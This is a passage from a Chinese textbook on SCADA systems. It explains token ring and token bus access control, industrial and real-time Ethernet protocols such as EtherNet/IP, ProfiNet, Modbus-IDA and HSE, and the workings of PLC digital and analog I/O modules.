802.5令牌环协议规定了介质访问控制完成的帧发送和接收,其访问控制原理是:当无信息在环上传送时,令牌处于“空闲”状态,它沿环从一个工作站到另一个工作站不停地进行传递。当某一工作站准备发送信息时,就必须等待,直到检测并捕获到经过该站的令牌为止,然后,将令牌的控制标志从“0”改为“1”,将令牌转换为帧的起始序列,令牌转换为数据帧。这时环中没有了令牌,只有数据帧绕环传递,实现了从环中删除令牌,保证只有一个站点拥有发送数据的权利。每个站都随时检测经过本站的帧,然后检查识别帧中的目的MAC地址,看是否是本站。如果不是就直接转发到下一站;如果是就接收帧,此时一边复制全部有关信息,一边继续转发该帧。该帧沿环一周返回到发送站后,由源站将该帧从环上移走或缓存起来,并与发送前的数据进行比较以检查数据帧传输的正确性。当发送站发完最后一帧的最后一位时便重新产生令牌,将令牌标志从“1”置为“0”,然后将令牌重新发送到环上,以便其他站有机会发送信息帧。 令牌环控制方式的优点是能提供优先权服务,有很强的实时性,在重负载环路中,“令牌”以循环方式工作,效率较高。缺点是控制电路较复杂,令牌容易丢失。 3.令牌总线 令牌总线介质访问控制协议就是IEEE 802.4。它类似于令牌环,每一个站点都可以侦听其他站点所发的信息,只有持有令牌的站的才可以发送信息。令牌总线采用总线形拓扑结构,因此具有CSMA/CD结构简单,轻负载下延时小的优点,又具有重负载时效率高,公平访问和传输距离较远的优点,同时还具有传送时间固定,可设置优先级等优点。缺点是比较复杂,时间开销大,工作站必须等多个无效的令牌传送才可获得令牌。 令牌总线的实现原理是:用令牌控制对介质的访问,只有令牌持有者才能控制总线,具有发送信息帧的权利,它可以发送一帧或多帧。令牌按一定的规则在网上的各站点直接循环地传递,从而形成一个逻辑环,每个站点在环中有一个指定的逻辑位置,它由3个地址决定:本地地址、先行站地址和后继站地址。网上各站可以不参加组成的逻辑环。环的组建、初始化和维护、站的插入和退出令牌的维护是由MAC控制帧来实现的。 令牌总线介质访问控制方法主要包括逻辑环的初始化、令牌的传递、插入环、退出环和故障管理等操作。 2.8.3 工业以太网概述 1.工业以太网的由来 控制网络的发展,其基本趋势是逐渐趋向开放、透明的通信协议。在工业控制领域,多台智能仪表信息交互传输的网络代替了传统的用导线传输模拟信号的方式。要使得不停厂商的设备能相互通信,需要解决这些处理现场层的设备之间通信标准的问题,这促进了现场总线技术的形成。但现场总线的开放性是有条件的、不彻底的。目前的现场总线由于种类繁多,互不兼容。因此,为减轻繁重的编程工作和达到系统的简单化,需要对系统的结构作变革。随着信息技术的不断飞跃,工业控制领域要求一种能够弥补现场总线缺陷,实现从控制层到现场层统一、高效、实时的通信标准,工业以太网就是适应这一需要而迅速发展起来的新的工业控制网络通信标准。 所谓工业以太网,一般来讲是指技术上与商用以太网(IEEE 802.3标准)兼容,但在产品设计时,在材质的选用、产品的强度、适用性以及实时性、可互操作性、可靠性、抗干扰性和本质安全等方面能满足工业现场的需要。随着互联网技术的发展、普及与推广,以太网技术也得到了迅速的发展,以太网传输速率的提高和以太网交换技术的发展,给解决以太网通信的非确定性问题带来了希望,并使以太网全面应用于工业控制领域成为可能。 由于工业控制网络不仅是一个完成数据传输的通信系统,而且还是一个借助网络完成控制功能的自动化系统。它除了完成数据传输之外,往往还需要依靠所传输的数据和指令,执行某些计算与操作功能,由多个网络节点协调完成自控任务。因而它需要在应用、用户等高层协议与规范上满足开放系统的要求,满足互操作条件。 目前工业以太网主要还是用在控制级及监控级,特别是在过程工业测控现场仍然大量采用现有的现场总线,如FF和Profibus PA。但在制造业等领域,一些远程I/O、变频器及人均界面等都向工业以太网接口快四过渡,市场上这类产品越来越多。例如西门子工控系统中以往采用DP总线实现主站与远程I/O站的通信,现在逐步采用工业以太网ProfiNet。罗克韦尔自动化用Ethernet/IP工业以太网代替以往的设备层总线,连接控制器主站与远程I/O从站。 2.工业以太网的功能要求 1)通信实时性和确定性 确定性是指网络中任何节点、在任何负载情况下都能在规定的时间内得到数据发送的机会,任何节点都不能独占传输媒介。而实时性主要通过响应时间和循环时间来反映。 以太网虽然在商业领域得到了广泛的应用,但用标准的UDP或TCP/IP协议与以太网一起来构建实时控制网络是困难的。这主要是因为以太网的媒介访问控制协议—CSMA/ CD碰撞检测方式有无法预见的延迟特性。当实时数据与非实时数据在普通以太网上同时传输时,由于实时数据与非实时数据在源节点的竞争以及与来自其他节点的实时与非实时数据的碰撞,实时数据将有可能经历不可预见的大延时,甚至长时间发不出去的情况。以太网的整个传输体系并没有有效的措施及时发现某一节点故障而加以隔离,从而有可能使故障节点独占总线而导致其他节点传输失效,工业控制响应的实时性问题就不能得到解决。 然而,以太网技术有了飞速进步。交换技术、全双工通信、快速以太网、千兆以太网、VLAN、IGMP、端口优先级等网络技术的出现使得以太网有了实时性,成为一个确定性的网络,使这一应用成为可能。首先,以太网的通信速率从10Mbps、100Mbps增大到如今的1000Mbps、1Gbps,在数据吞吐量相同的情况下,通信速率的提高意味着网络负荷的减轻和网络传输延时的减小,即网络碰撞机率大大下降。其次,采用星形网络拓扑结构,交换机将网络划分为若干个网段。以太网交换机由于具有数据存储、转发的功能,使各端口之间输入和输出的数据帧能够得到缓冲,不再发生碰撞; 同时工业以太网交换机还可对网络上传输的数据进行过滤,使每个网段内节点间数据的传输只限在本地网段内进行,而不需经过主干网,也不占用其他网段的带宽,从而降低了所有网段和主干网的网络负荷。再次,全双工通信又使得端口间两对双绞线(或两根光纤)上分别同时接收和发送报文帧,也不会发生冲突。因此,采用交换式集线器和全双工通信,可使网络上的冲突域不复存在(全双工通信),或碰撞概率大大降低(半双工),因此使以太网通信确定性和实时性大大提高。 2)网络弹性 网络弹性是指以太网应用于工业现场控制时,必须具有较强的网络可用性。工业以太网的网络弹性包括以下几个方面: (1)可靠性—在基于以太网的控制系统中,网络成为关键性设备,系统和网络的结合使得可靠性成为设计重点。高可靠重负荷设计的工业以太网能最好地满足这种要求。在IEEE 802.3标准中,对以太网的总线供电规范也进行了定义。此外,在实际应用中,主干网可采用光纤传输,对于重要的网段还可采用冗余网络技术,以此提高网络的抗干扰能力和可靠性。 (2)可恢复性—当网络系统中任一设备或网段发生故障而不能正常工作时,系统能依靠事先设计的自动恢复程序将断开的网络重新链接起来,并将故障进行隔离,使任一局部故障不会影响整个系统的正常运行。工业以太网通常使用光纤环网作为链路冗余,以此保证系统的不间断运行。 (3)可维护性—工业以太网通过使用网管软件进行故障定位和自动报警,使故障能够得到及时处理,同时网管软件还可以进行性能管理、配置管理、变化管理等内容。工业以太网使用导轨式安装或模块化结构来满足维修更换的快速性和便捷性。 (4)网络安全性—工业以太网把传统的三层网络系统(信息层、控制层、设备层)合为一体,使各层网络之间的数据能够“透明”地传输,数据传输的速率更快、实时性更高,同时还可以方便地接入Internet,实现远程监控等功能。在这种情况下,网络安全就显得尤为重要。对此,可采用网络隔离的办法,如采用网关、路由器和防火墙将内部网络与外部网络分开。 (5)环境适应性—针对工业应用环境需要,许多具有相应防护等级的工业级产品被生产。这些产品专门针对工作温度、湿度、干扰、辐射等工业现场环境的不同需要,分别采取相应的措施,从而更好地满足工业现场使用要求。 3. 实时工业以太网 在工业控制系统中,实时可定义为系统对某事件反应的可测性。也就是说,在一个事件发生后,系统必须在一个可以准确预见的时间范围内做出反映。工业上,对数据传递的实时性要求十分严格,例如,某些数据的收发要有严格的先后时序要求,某些数据要以固定的时间间隔定时刷新等,要确保这些数据的正确传送,就要求网络通信满足实时性、确定性、时序性要求。而传统以太网由于采用CSMA/CD这种随机的介质访问方式,使多个节点以平等竞争的方式争夺总线使用权,当发生冲突时,数据就需要重新发送,很明显这种解决冲突的机制是以时间为代价的,很难满足工业控制领域对实时性的要求。 通过采用减轻以太网负荷、提高网络速度、采用交换式以太网和全双工通信、采用流量控制及虚拟局城网等技术,到目前为止可以将工业以太网的实时响应时间做到5~10ms,相当于现有的现场总线。对于响应时间小于5ms的应用,工业以太网已不能胜任。为了满足高实时性能应用的需要,各大公司和标准组织纷纷提出各种提升工业以太网实时性的技术解决方案。这些方案建立在IEEE 802.3标准的基础上。通过对其和相关标准的实时扩展提高实时性,并且做到与标准以太网的无缝连接,从而产生了实时以太网(Real Time Ethernet,RTE)。实时以太网是工业以太网针对实时性、确定性问题的解决方案,属于工业以太网的特色与核心技术。从控制网络的角度看,工作在现场控制层的实时以太网,实际上属于一个新类别的现场总线。 当前实时以太网还处于开发阶段,出现的技术种类繁多,仅在IEC 61784-2中就已囊括了11个实时以太网的PAS文件。它们是EtherNet/IP、ProfiNet、P-NET、Interbus、VNET /IP、TCnet、EtherCAT、EtherNet Powerlink、EPA、Modbus-RTPS、SERVOS-Ⅲ等。它们在实时机制、实时性能、通信一致性上都存在很大差异,可分为以下几类: (1)用一个主站控制网络上的时隙,主站授权每个节点独立发送数据。例如,在EtherCAT和SERCOS III网络,集束帧报文的传输跟随主站的时钟。 (2)采用专为实时以太网开发的专用通信芯片,实现等时同步实时通信机制,如ProfiNet。 (3)采用基于IEEE 1588时钟同步协议,运用软、硬件配合的方式实现微秒乃至纳秒级的高精度时钟同步策略,如EtherNet/IP。 从目前发展情况来看,EtherNet/IP、ProfiNet、EtherCAT、EtherNet Powerlink、EPA 和Modbus-IDA是6个主要的竞争对手,其中大约四分之三的工业以太网使用Ethernet/ IP、ProfiNet和Modbus/TCP,而Powerlink和EtherCAT这两个系统特别适合硬实时性要求;SERVOS-Ⅲ尽管市场份额较小,但是,它在高速运动控制领域扮演着非常重要的角色。 2.8.4 几种典型工业以太网 在IT领域,典型的应用层协议包括HTTP、FTP、SNMP等。然而,当把以太网技术用于工业控制时,由于长久以来不同的工控厂家采取不同的通信协议,同时由于工业控制对应用层协议的实时性要求等原因,目前为止在工业控制系统中还没有统一的应用层协议。鉴于Ethernet/IP、ProfiNet、Modbus-IDA和HSE在市场上占有率较高,因此,对这几种工业以太网做简单介绍。 1. Ethernet/IP实时以太网 1)概述 从1998年开始,CI的一个特别兴趣小组(Special Interest Group,SIG)开始尝试将DeviceNet和ControlNet所使用的CIP协议移植到以太网上。于是,在 2000年ControlNet国际组织CI、工业以太网协会IEA和开放的DeviceNet供应商协会ODVA推出了EtherNet /IP。Ethernet/IP采用了应用广泛的以太网通信芯片以及物理介质,又在TCP/IP之上附加CIP(Common Industrial Protoco1)实时扩展功能,在应用层进行实时数据交换和运行实时应用。CIP的控制部分用于实时I/O报文或隐形报文,CIP的信息部分用于报文交换,也称作显性报文。ControlNet、DeviceNet和Ethemet/IP都使用该协议通信,3种网络分享相同的对象库,对象和装置行规使得多个供应商的装置能在上述3种网络中实现即插即用。Ethemet/IP能够用于处理多达每个包l500字节的大批量数据,它以可预报方式管理大批量数据。 EtherNet/IP 工业以太网具有许多优点,比如由其组成的系统兼容性和互操作性好,资源共享能力强,可以很容易的实现控制现场的数据与信息系统上的资源共享;数据的传输距离长、传输速率高;易与Internet 连接,低成本、易组网,与计算机、服务器的接口十分方便,受到了广泛的技术支持。基于商业以太网开发的各种以太网报文侦听和流量优化控制软件,甚至可以不加修改地应用到工业以太网控制系统中。目前EtherNet/IP工业以太网的应用主要是在自动化领域的信息层和控制层。 2003年ODVA组织将IEEE 1588精确时间同步协议用于Ethemet/IP,制定了CIPsync标准以进一步提高Ethernet/IP的实时性。该标准要求每秒钟由主控制器广播一个同步化信号到网络上的各个节点,要求所有节点的同步精度准确到微秒级。为此,芯片制造商增加一个“加速”线路到以太网芯片,从而将性能改善到500毫微秒的精度。由此可见,CIPsync 是CIP的实时扩展。 2)Ethernet/IP协议模型及协议内容 EtherNet/IP像其他的CIP网络一样,也遵从OSI七层模型。EtherNet/IP在会话层以上执行CIP,并使CIP适应传输层以下特殊的EtherNet/IP技术,其网络结构如图2.34所示。 图2.34 Etherner/IP的网络模型 (1)物理层 在EtherNet/IP中,物理层主要为它提供了物理的电气、机械等特性描述。EtherNet/ IP在物理层和数据链路层使用标准的IEEE802.3技术。这个标准提供了物理介质规范,为设备间移动的数据包定义了一个简单的帧格式,以及当两个设备试图同时使用数据通道时,提供一系列决定网络设备响应的规则。EtherNet/IP网络采用有源星型拓扑结构,所有设备以点对点的方式直接与交换机建立连接。星型拓扑结构的优势在于可以同时支持10Mbps和100Mbps的节点设备。因此,可以在网络中混合使用10Mbps和100Mps的节点设备,以太网交换机都能与它们进行通信。另外星型拓扑结构使得节点设备间的连线更为简捷,为故障诊断和后期维护带来方便。EtherNet/IP在物理层和数据链路层采用以太网,其主要由以太网控制器芯片来实现。 EtherNet/IP采用同轴电缆、双绞线和光纤作为传输介质。使用双绞线的传输距离为100m,其中,10Base-T用于10Mbps网段的连接;l00Base.TX用于100Mbps网段连接和快速以太网运行。光纤为长距离传输提供了解决方案,它的传输距离为2000m,其中10Base-FL用于10Mbps连接;100Base-FX用于100Mbps(快速以太网)连接;1000Base-SX用于1Gbps连接。 (2)数据链路层 IEEE802.3规范也作为EtherNet/IP数据链路层上设备间传输数据包的标准。以太网使用CSMA/CD机制来解决通信介质的竞争。当节点想传送数据时,它先侦听网络,如果侦听到两个或更多个节点之间的冲突,此节点要停止传送并等待一个随机时间后重试。此随机时间由标准的二进制指数回退(Binary Exponential Back-off,BEB)算法来决定。在达到10次碰撞后,此随机时间固定在1023个时隙,在16次碰撞之后,节点不再试图传送并向节点微处理器报告传送失败,由更高层协议决定是否重试。 (3)网络层和传输层 在网络层和传输层,EtherNet/IP利用TCP/IP协议在一个或多个设备之间发送信息。在这些层中,所有CIP网络使用封装技术封装标准CIP报文。TCP/IP封装允许网络上的节点将信息作为数据部分嵌入到以太网报文中。节点发送TCP/IP协议到数据链路层。通过使用TCP/IP,EtherNet/IP能够发送显式报文,用于节点间执行客户一服务类型处理。 TCP/IP由TCP和IP两部分组成。其中TCP协议是一种面向连接的、点对点传输机制。这种机制提供数据流控制、分裂重组以及报文应答功能。节点必须说明每个报文,执行请求任务和产生响应。因为TCP用于大量数据的可靠传输是非常理想的,所以EtherNet/ IP使用TCP/IP封装CIP显式报文,这些显式报文通常为组态、诊断和事件数据。 IP协议是TCP/IP协议栈中最重要的一层,主要功能是把源主机上的分组发送到互联网中的任何一台目的主机上。由于在源主机和目的主机之间可能有多条通路相连,因而网络就要在这些通路中作出选择,即进行路由选择。IP协议是一种无连接、不可靠的数据传输协议,因为它只负责数据包在网络中的传输,而不管传输的正确与否,不进行数据包的确认,也不能保证数据包按正确的顺序到达。 EtherNet/IP的UDP是与网络层相邻的上一层常用的一个非常简单的协议,它的主要功能是在IP层之上提供协议端口功能,以标识源主机和目的主机上的通信进程。它只是保证进程之间通信的基本要求,而没有提供数据传输过程中的可靠性保证措施。它是一种无连接、不可靠的数据传输服务协议。UDP用来传输实时报文,如I/O数据(隐式报文:其数据域不包含协议信息,只有实时I/O数据)等。UDP报文比较小,处理速度比显式报文快,所以EtherNet/IP使用UDP传输实时控制数据。 3)EtherNet/IP 的通信机制 (1)通信模式 不同于源/目的通信模式,EtherNet/IP 采用生产/消费模式,它允许网络上的节点同时存取同一个源的数据。在生产/消费模式中,数据被分配一个唯一的标识,每一个数据源一次性的将数据发送到网络上,其他节点选择性的读取这些数据,从而提高了系统的通信效率。 (2)CIP 报文通信 CIP 报文定义了显式报文和隐式报文两种报文类型, 隐式报文是对时间有苛刻要求的I/O信息(时间触发、控制器互锁等等),此时数据量不大但需要高的速度或需要较长的源节点和其他节点连接时间,所以这部分采用的是速度较快的UDP 协议;显式报文数据量较大但不需要一直连接所以这部分采用TCP 协议。 CIP 报文的通信分为无连接的通信和基于连接的通信。无连接的报文通信是CIP 定义的最基本的通信方式。设备的无连接通信资源由无连接报文管理器UCMM 管理。无连接通信不需要任何设置或任何机制保持连接激活状态; 基于连接的报文通信是CIP 网路传递报文的另一种方式,可用来传递I/O数据和显式报文。这种通信方式支持生产者/消费者模式的多点传输关系, 一次向多个目的节点进行高效的数据传输。 2. ProfiNet实时以太网 1)概述 ProfiNet实时工业以太网是由Profibus International(PI)组织提出的基于以太网的自动化标准。它基于工业以太网技术,使用TCP/IP和IT标准,是一种实时以太网技术,同时无缝地集成现有的现场总线系统。作为完整、先进的工业通信解决方案,ProfiNet包括8个主要功能模块,分别为实时通信、分布式现场设备、运动控制、分布式智能、网络安装、IT标准和网络安全、故障安全和过程自动化。 2)ProfiNet的网络模型与OSI模型(见图2.35) ProfiNet的物理层采用了快速以太网的物理层,数据链路层采用的也是IEEE802.3标准,但采取了改进措施;网络层和传输层采用了IP/TCP/UDP,OSI中的第5层、第6层未用,根据分布式系统中ProfiNet控制对象的不同,应用层分为无连接的和有连接的两种。 图2.35 ProfiNet的网络模型 3)ProfiNet的通信方式 ProfiNet中的通信采用的是提供者和消费者方式,数据提供者(例如现场的传感器等)把信号传送给消费者(例如PLC主站),然后消费者根据控制程序对数据进行处理后,再把输出数据返送给现场的消费者(例如执行器等)。 由于TCP/IP或UDP/IP都不能满足过程数据循环更新时间小于10ms的要求,对以太网中影响实时性和确定性的因素也必须改进才能满足工业自动化领域的要求。因此,ProfiNet的通信通道模型采用如图2.36所示的结构。从图中可以看出,在ProfiNet设备的一个通信循环周期内,ProfiNet提供一个标准通信通道和两类实时通信通道。标准通道是使用TCP/IP协议的非实时通信通道,主要用于设备参数化、组态和读取诊断数据。实时通道RT是软实时SRT(Software RT)方案,主要用于过程数据的高性能循环传输、事件控制的信号与报警信号等。旁路通信协议模型的第3层和第4层,提供精确通信能力。为优化通信功能,ProfiNet根据IEEE 802.1p定义了报文的优先级,最多可用7级。实时通道IRT采用了IRT(Isochronous Rea1-Time)等时同步实时的ASIC芯片解决方案,以进一步缩短通信栈软件的处理时间,特别适用于高性能传输、过程数据的等时同步传输以及快速的时钟同步运动控制应用,在lms时间周期内,可实现对100多个轴的控制,而抖动不足1μs。模型中的标准IT应用层协议可用于ProfiNet和MES、ERP等上层网络的数据交换。 由于IRT基于一个建立在快速以太网第二层上的时间触发协议,即对标准的以太网第二层协议进行了修改,因此,采用该协议进行实时类型数据交换时必须使用特殊的交换机,而且实现时还需要进行明确的通信规则声明。 图2.36 ProfiNet通信通道模型 4)ProfiNet 的应用方式 ProfiNet主要有两种通信方式:一种是ProfiNet IO,它实现控制器与分布式I/O之间的实时通信;另外一种是ProfiNet CBA,实现分布式智能设备之间的实时通信。图2.37所示即为典型的应用示例。由于工业控制系统可由多个分布式系统组成,图2.37中系统可看作由A和B两个子系统组成。其中,A系统由PLC控制器及由其控制的智能现场设备构成,二者通过支持ProfiNet标准的以太网口直接连接到工业以太网上。B系统由两台连接在Profibus-DP总线上的现场设备和PLC控制器组成,它们分别由支持ProfiNet的代理服务器和以太网接口挂接在工业以太网上。对于两个子系统内部,通过采用ProfiNet IO方式可实现系统内部的高速过程数据通信。而子系统之间,通过跨供应商的组态软件,可将A、B系统中的机电设备和应用软件组态为智能模块,经过ProfiNet组件的生成、连接和下载实现ProfiNet CBA通信,达到A、B子系统以及PC监视器之间的组态、HMI监控及诊断数据交换目的。 图2.37 ProfiNet运用方式示意图 3.Modbus-IDA实时以太网 Modbus组织和IDA(Interface for Distributed Automation,IDA)集团都致力于建立基于EthernetTCP/IP和Web互联网技术的分布式智能自动化系统,为了提高竞争力,2003 年l0月,两个组织宣布合并,联手开发Modbus-IDA实时以太网。 Modbus-IDA也采用了当前应用广泛的以太网通信芯片以及物理媒体,其实时扩展方案是为以太网建立一个新的实时通信应用层,采用一种新的通信协议RTPS(Rea1-Time Publish/Subscribe)实现实时通信,该协议的实现则由一个中间件来完成。Modbus-IDA通信协议模型建立在面向对象的基础上,这些对象可以通过API应用程序接口被应用层调用。通信协议同时提供实时服务和非实时服务。非实时通信基于TCP/IP协议,充分采用IT成熟技术,如基于网页的诊断和配置(HTTP)、文件传输(FTP)、网络管理(SNMP)、地址管理(BOOTP/DHCP)和邮件通知(SMTP)等;实时通信服务建立在RTPS实时发布者/预订者模式和Modbus协议之上。RTPS协议及其应用程序接口API由一个对各种设备都一致的中间件来实现,它采用美国RTI(Rea1-Time Innovations)公司的NDDS 3.0 (Network Data Delivery Service)实时通信系统。RTPS建立在Pubilsh/Subscribe模式基础上,并进行了扩展,增加了设置数据发送截止时间、控制数据流速率和使用多址广播等功能。它可以简化为一个数据发送者和多个数据接收者之间通信编程的工作,极大地减轻网络的负荷。RTPS构建在UDP协议之上,Modbus协议构建在TCP协议之上。 4. HSE高速以太网 HSE(High Speed Ethernet)是由FF提出的工业以太网协议,它支持所有的FF H1低速总线的功能。HSE是802.3协议以太网、TCP/IP和UDP/IP协议,以及独具特色的现场设备访问技术FDA的结合体。FF现场总线基金会明确将HSE定位于实现控制网络与Internet的集成。HSE技术的一个核心部分就是链接设备,它是HSE体系结构将Hl (31.25kb/s)设备连接到 100Mb/s的HSE主干网的关键组成部分,同时也具有网桥和网关的功能。网桥功能能够用于连接多个H1总线网段,使同一H1网段上的H1设备之间能够进行对等通信而无需主机系统的干预。网关功能允许将HSE网络连接到其他的工厂控制网络和信息网络,HSE链接设备不需要为H1子系统作报文解释,而是将来自H1总线网段的报文数据集合起来并且将Hl地址转化为IP地址。在这种体系结构的基础上,不仅可以实现在标准的Ethernet结构框架内的无缝操作,而且可以有效阻断特殊类型信息出入网络,保证网络信息安全。 第3章 I/O接口与数据采集技术 3.1 SCADA系统I/O接口概述 过程输入/输出通道是SCADA系统上、下位机与被控过程现场测控设备之间的物理信息通道。过程输入/输出通道除了有A/D、D/A、DI、DO等I/O设备外,通常还包括一些辅助的部件,如多路转换开关、放大器、采样保持器、热电偶冷端温度补偿装置等。这些辅助部件既可以部分地与I/O设备做在一起构成相对独立的数据采集设备,也可以做成独立的卡件(如端子板形式),再将这些卡件通过电缆与I/O设备连接,构成输入/输出通道。图3.1所示为数据采集系统示意图,在该系统中,就有多种类型的输入和输出通道。在SCADA系统中,现场的各种参数由输入通道进入计算机,而SCADA系统的各种控制命令则通过输出通道传递给执行机构,进而实现对被控过程的控制。SCADA系统的输入/输出通道有时也称为计算机接口(interface),在本书称为I/O接口。由于输入/输出通道是联系SCADA系统与外界的桥梁,系统的测量、控制精度与通道的性能密切相关,设计者应根据SCADA系统的技术要求合理选择通道的类型、参数及其数量。 图3.1 数据采集系统中的过程通道 SCADA系统的I/O接口,不仅实现了计算机与监控过程的信号传输,而且还解决了计算机与外部设备连接时存在的各种矛盾,如输入/输出信号形式的不同、速度的不匹配、串/并联转换以及信号隔离等。I/O接口的功能归纳起来主要有以下几点: (1)数据缓冲功能—计算机的工作速度快,而外部设备的工作速度比较慢,为了避免因速度不一致导致的数据丢失,接口中一般都设置有数据寄存器或锁存器。 (2)信号转换功能—由于外部设备所需要的控制信号和所能提供的状态信号与计算机能识别的信号往往是不一致的,特别是连接不同公司生产的设备时,进行信号之间的转换是不可避免的。信号的转换包括时序的配合、电平的转换、信号类型的转换、数据宽度的转换(并行变串行或串行变并行)等。 (3)驱动功能—由于计算机总线的信号驱动能力有限,当要连接多台外部设备时,总线可能就会不堪重负,因此,可以通过扩展的接口来连接多台外部设备。 (4)中断管理功能—当外部设备需要及时得到计算机的服务时,就要求接口设备具有中断控制管理功能。 (5)隔离功能—接口上的光电隔离或电气隔离等各种隔离措施可以确保计算机系统的安全。 虽然在选择SCADA系统的I/O设备时并不需要深入研究各种I/O通道的组成和其工作原理及实现过程,但对SCADA系统的设计人员来说,了解相关I/O通道的组成、电路、典型芯片及其编程方法有助于设计和开发高质量的数据采集系统。 3.2 I/O接口模块 3.2.1 数字量模块 在SCADA系统中,数字信号有编码数字(二进制数或十进制数)、开关量、脉冲序列等。各种按键、继电器和无触点开关(晶体管、晶闸管等)是典型的开关量,而控制步进电机的则是脉冲序列信号。这些信号有高电平和低电平两个状态,相当于二进制数的1和0,计算机处理较为方便。由于数字量信号是计算机直接能接收和处理的信号,所以数字量输入输出通道比较简单,主要是解决信号的缓冲和锁存问题。 SCADA系统通过开关量输入通道引入被控对象开关量信息,进行必要的逻辑运算后,将输出的数字信号通过开关量输出通道发出,去驱动发光二极管、继电器或其他开关量设备,以实现诸如越限声光报警、双位式阀门的开启或关闭以及电动机的启停等。 如果开关量信号按照一定的周期变化,这样的信号也称为脉冲量信号。频率、转速的测量一般都是通过对传感器输出的脉冲计量来实现的。在运动控制中,编码器输出的信号也是脉冲信号,根据脉冲的数目,可以知道电机角位移和转速。还可以输出脉冲信号来控制步进电机的转角和转速。对于不规则的脉冲信号,通常要进行电路整形,以利于测量。 由于在工业现场存在电场、磁场、噪声等各种干扰,在输入/输出通道中往往需要设置隔离器件,以抑制干扰的影响。开关量输入/输出通道的主要技术指标是抗干扰能力和可靠性,而不是精度。这里,以PLC的I/O模块为例进行介绍。 1. 数字量输入模块 根据外接电源的不同,可以把数字量输入模块可分为直流输入模块和交流输入模块。通常情况下,如果现场接点与模块的接线端子距离较小,可以用直流输入模块,如果距离较远,应该用交流输入模拟。 1)直流输入模块 直流输入模块的输入电路如图3.2所示。光电耦合器隔离了输入电路与PLC内部电路的电气连接,使外部信号通过光电耦合器变成内部电路能接收的标准信号。当现场开关闭合后,外部直接电压经过电阻R1和阻容滤波后加到双向光电耦合器的发光二极管上,经光电耦合器,光敏晶体管接收光信号,并将接收的信号送入内部电路,在输入采样时送至输入映像寄存器。现场开关通/断状态对应输入映像寄存器的I/O状态,即当现场开关闭合时,对应的输入映像寄存器为“1”状态;当现场开关断开时,对应的输入映像寄存器为“0”状态。当输入端的发光二极管(VL)点亮,即指示现场开关闭合。外部直流电源用于检测输入点的状态,其极性可以任意接入。图3.2中,电阻R2和电容C构成滤波电路,可滤掉输入信号的高频抖动。双向光电耦合器起整流和隔离的双重作用,双向发光二极管VL用于状态指示。 图3.2 直流数字量输入模块内部电路 2)交流输入模块 交流输入模块的输入电路如图3.3所示。当现场开关闭合后,交流电源经C、R2、双向光电耦合器中的一个发光二极管,使发光二极管发光,经光电耦合器,光敏晶体管接收光信号,并将该信号送至PLC内部电路.供CPU处理。双向发光二极管VL指示输入状态。 图3.3 交流数字量输入模块内部电路 为防止输入信号过高,每路输入信号并接取样电阻Rl用来限幅;为减少高频信号串扰,串接R2、C作为高频去耦电路。 2.数字量输出模块 数字量输出模块的每一个输出点能控制一个用户的数字型(ON/OFF)负载。典型的负载包括:继电器线圈、接触器线圈、电磁阀线圈、指示灯等。每一个输出点与一个且仅与一个输出电路相连,通过输出电路把CPU运算处理的结果转换成驱动现场执行机构的各种大功率开关信号。 1)直流输出模块 直流输出模块是晶体管输出方式,或用场效应晶体管(MOSFET)驱动。图3.4所示为直流输出模块的输出电路。当PLC进入输出刷新阶段时,通过数据总线把CPU的运算结果由输出映像寄存器集中传送给输出锁存器;输出锁存器的输出使光电耦合器的发光二极管发光,光敏晶体管受光导通后,使场效应晶体管饱和导通,相应的直流负载在外部直流电源的激励下通电工作。当对应的输出映像寄存器为“1”状态时,负载在外部电源激励下通电工作;当对应的输出映像寄存器为“0”状态时,外部负载断电,停止工作。图3.4中光电耦合器实现光隔离,场效应晶体管作为功率驱动的开关器件,稳压管用于防止输出端过电压以保护场效应晶体管,发光二极管用于指示输出状态。 图3.4 场效应晶体管输出电路 晶体管(或场效应晶体管)输出方式的特点是输出响应速度快。场效应晶体管的工作频率可达20kHz。因此,在需要驱动步进电机、固态继电器时,需要选用该类模块,而不能选用继电器类型输出模块。 2)交流输出模块 交流输出模块工作电源包括ACl20 V或230V。交流输出模块是晶闸管输出方式,其特点是输出启动电流大。当PLC有信号输出时,通过输出电路使发光二极管导通,通过光电耦合器使双向晶闸管导通,交流负载在外部交流电源的激励下得电。发光二极管VL点亮,指示输出有效。图3.5中,固态继电器(ACSSR)作为功率放大的开关器件,同时也是光电隔离器件,电阻R2和电容C组成高频滤波电路,压敏电阻起过电压保护作用,可以消除尖峰电压。 图3.5 交流数字量输出模块内部电路 3.2.2 模拟量模块 1. 模拟量输入模块 模拟量信号是一种连续变化的物理量,如电流、电压、温度、压力、位移、速度等。工业控制中,要对这些模拟量进行采集并送给PLC的CPU,必须先对这些模拟量进行模数(A/D)转换。模拟量输入模块就是用来将模拟信号转换成PLC所能接收的数字信号的。生产过程的模拟信号是多种多样的,类型和参数大小也不相同,因此,一般先用现场信号变送器把它们变换成统一的标难信号(如4~20mA的直流电流信号、0~5V的直流电压信号等),然后再送入模拟量输入模块将模拟量信号转换成数字量信号,以便PLC的CPU进行处理。模拟量输入模块一般由滤波、模数(A/D)转换、光电耦合器等部分组成。光电耦合器有效防止了电磁干扰。对多通道的模拟量输入单元,通常设置多路转换开关进行通道的切换,且在输出端设置信号寄存器。 模拟量输入模块设有电压信号和电流信号输入端。输入信号经滤波、放大、模数(A/D)转换得到数字量信号。再经光电耦合器进入PLC内部电路。 此外,由于工业现场大量使用热电偶、热电阻测温,因此,控制设备厂家都生产相应的模块。热电偶模块具有冷端补偿电路,以消除冷端温度变化带来的测量误差。热电阻的接线方式有2线、3线和4线3种。通过合理的接线方式,可以消除连接导线电阻变化的影响,提高测量精度。 选择模拟量输入模块时,除了要明确信号类型外,还要注意模块(通道)的精度、转换时间等是否满足实际数据采集系统的要求。 2. 模拟量输出模块 现场的执行器,如电动调节阀、气动调节阀、调速电机等都需要模拟量来控制,所以模拟量输出通道的任务就是将计算机计算的数字量转换为可以推动执行器动作的模拟量。模拟量输出模块一般由光电耦合器、数模(D/A)转换器和信号驱动等环节组成。 模拟量输出模块输出的模拟量可以是电压信号,也可以是电流传号。电压或电流信号的输出范围通常可调整,如电流输出,可以设置为0~20 mA 或4~20 mA。不同厂家的设置方式不同,有些需要通过硬件进行设置,有些需要通过软件设置,而且电压输出或电流输出时,外部接线也不同,这需要特别注意。 3.3 基于PC的数据采集技术 3.3.1 常用的数据采集方法 计算机监控系统中,数据采集是核心。在一些小规模的SCADA系统中,上位机功能较简单,主要的功能实现就在下位机的数据采集。常用的数据采集方式有:基于嵌入式装置的数据采集、网络化数据采集和基于虚拟仪器的数据采集。 